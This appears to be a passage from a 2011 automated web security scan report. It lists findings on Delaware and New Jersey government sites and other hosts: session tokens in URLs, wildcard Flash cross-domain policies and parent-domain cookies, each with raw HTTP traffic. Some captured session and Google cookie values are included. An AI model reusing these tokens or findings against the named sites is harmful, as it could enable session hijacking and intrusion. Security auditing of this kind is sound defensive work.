<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Revenue</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">General Questions & Help</a></strong> - M-F: 8:30 to 4:30 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...

4.2. http://server.iad.liveperson.net/hc/33511087/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://server.iad.liveperson.net
Path:	/hc/33511087/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://server.iad.liveperson.net/hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//www.delaware.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=9159955777&scriptVersion=1.1&d=1310522478911&&SESSIONVAR!skill=Portal_Topics&PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer=

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//www.delaware.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=9159955777&scriptVersion=1.1&d=1310522478911&&SESSIONVAR!skill=Portal_Topics&PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5099524182751471388; LivePersonID=-16101514677756-1310522366:-1:-1:-1:-1; HumanClickSiteContainerID_33511087=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522476608

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:01:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a2............,...........L.;

4.3. http://www.delaware.gov/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.delaware.gov
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/
http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/
http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/

Request

GET / HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta name="verify-v1" content="thP3VfXQ653dVrb9ExI9XqvyNnfVO9/R4FszK
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Corporations</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Revenue</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">General Questions & Help</a></strong> - M-F: 8:30 to 4:30 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...

4.4. http://www.njleg.state.nj.us/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.njleg.state.nj.us
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.njleg.state.nj.us/media/archive_audio.asp?SESSION=2010

Request

GET / HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:50:00 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=EHFKMCHBKABALIEPADMHHJAI; path=/
Cache-control: private

<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="1"> <a href="media/archive_audio.asp?SESSION=2010"><b>
...[SNIP]...

4.5. http://www.njleg.state.nj.us/Default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.njleg.state.nj.us
Path:	/Default.asp

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.njleg.state.nj.us/media/archive_audio.asp?SESSION=2010

Request

GET /Default.asp HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:49:59 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=BHFKMCHBAILGMCBNDLEBOAHM; path=/
Cache-control: private

<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="1"> <a href="media/archive_audio.asp?SESSION=2010"><b>
...[SNIP]...

5. Flash cross-domain policy previous next
There are 2 instances of this issue:

http://nj.gov/crossdomain.xml
http://www.state.nj.us/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://nj.gov/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nj.gov
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nj.gov

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:38:25 GMT
Content-length: 333
Content-type: text/xml
Last-modified: Thu, 11 Mar 2010 19:28:31 GMT
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.state.nj.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nj.gov" secure="true" />
...[SNIP]...

5.2. http://www.state.nj.us/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.state.nj.us

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:40:36 GMT
Content-length: 333
Content-type: text/xml
Last-modified: Thu, 11 Mar 2010 19:28:31 GMT
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.state.nj.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nj.gov" secure="true" />
...[SNIP]...

6. Cookie scoped to parent domain previous next
There are 21 instances of this issue:

http://www.cio.ny.gov/universal_broadband
http://www.opensource.org/licenses/gpl-3.0.html
http://www.opensource.org/licenses/mit-license.php
http://www.visitnj.org/events
http://www.visitnj.org/new-jerseys-wineries
http://ads.doclix.com/adserver/serve/js/banner_unit.jsp
http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp
http://id.google.com/verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/ipod/images/gradient_texture20100901.jpg
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
http://www.facebook.com/NewJerseyLottery
http://www.facebook.com/feeds/page.php
http://www.google.com/
http://www.google.com/reviews/scripts/annotations_bootstrap.js
http://www.youtube.com/NewJerseyGovernment
http://www.youtube.com/newjerseylottery

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

6.1. http://www.cio.ny.gov/universal_broadband previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cio.ny.gov
Path:	/universal_broadband

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.2. http://www.opensource.org/licenses/gpl-3.0.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-3.0.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:16 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:46 GMT
ETag: "e73d99926e74ae2d28e0d29f4e2b995f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.3. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:15 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:29 GMT
ETag: "e3748fe2bbaca53c3b673355a01e8f37"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.4. http://www.visitnj.org/events previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.visitnj.org
Path:	/events

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.5. http://www.visitnj.org/new-jerseys-wineries previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.visitnj.org
Path:	/new-jerseys-wineries

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.6. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/banner_unit.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ad_served=YmFubmVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/banner_unit.jsp?pid=16609&codeId=2351&cnt=1&width=728&height=90&pageId=66798966&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=YmFubmVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38237
Connection: close

<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>AdSide: Sponsored Links</title>
       <script src="doclix_lib.js" type="text/javascri
...[SNIP]...

6.7. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/pop_under_unit.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/pop_under_unit.jsp?pid=16609&codeId=3794&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>

           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...

6.8. http://id.google.com/verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=48=NeqCa76J_YVQvK2LRrkDwCqnvpZukiycSVuP9dW3=5oNHLt4ofQjLAHFr; expires=Thu, 12-Jan-2012 11:39:23 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=soris
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=NeqCa76J_YVQvK2LRrkDwCqnvpZukiycSVuP9dW3=5oNHLt4ofQjLAHFr; expires=Thu, 12-Jan-2012 11:39:23 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
